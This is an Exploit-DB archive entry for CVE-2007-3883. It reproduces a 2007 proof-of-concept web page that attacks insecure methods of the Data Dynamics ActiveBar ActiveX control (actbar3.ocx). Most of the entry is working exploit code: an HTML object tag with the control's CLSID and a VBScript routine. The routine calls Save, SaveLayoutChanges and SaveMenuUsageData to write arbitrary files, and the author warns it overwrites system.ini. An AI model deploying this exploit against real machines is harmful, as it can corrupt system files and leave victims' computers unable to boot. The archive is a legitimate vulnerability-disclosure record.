Data Dynamics ActiveBar ActiveX actbar3.ocx <= 3.1 Insecure Methods

2007-07-17T00:00:00
ID EDB-ID:4190
Type exploitdb
Reporter shinnai
Modified 2007-07-17T00:00:00

Description

Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) Insecure Methods. CVE-2007-3883. Remote exploit for windows platform

                                        
                                            &lt;pre&gt;
&lt;code&gt;&lt;span style="font: 10pt Courier New;"&gt;&lt;span class="general1-symbol"&gt;---------------------------------------------------------------------------------------
 &lt;b&gt;Data Dynamics ActiveBar ActiveX Control (actbar3.ocx &lt;= 3.1) Multiple Inscure Methods&lt;/b&gt;
 url: http://www.datadynamics.com/default.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 &lt;b&gt;&lt;font color="#FF0000"&gt;THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!&lt;/font&gt;&lt;/b&gt;

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 &lt;b&gt;This control is marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False&lt;/b&gt;
---------------------------------------------------------------------------------------

&lt;object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'&gt;&lt;/object&gt;

&lt;select style="width: 404px" name="Pucca"&gt;
  &lt;option value = "Save"&gt;Save&lt;/option&gt;
  &lt;option value = "SaveLayoutChanges"&gt;SaveLayoutChanges&lt;/option&gt;
  &lt;option value = "SaveMenuUsageData"&gt;SaveMenuUsageData&lt;/option&gt;
&lt;/select&gt;

&lt;input language=VBScript onclick=tryMe() type=button value="Click here to start the test"&gt;

&lt;script language='vbscript'&gt;
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\carlo1.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\carlo2.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\carlo3.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   end if

 End Sub
&lt;/script&gt;

&lt;/span&gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

# milw0rm.com [2007-07-17]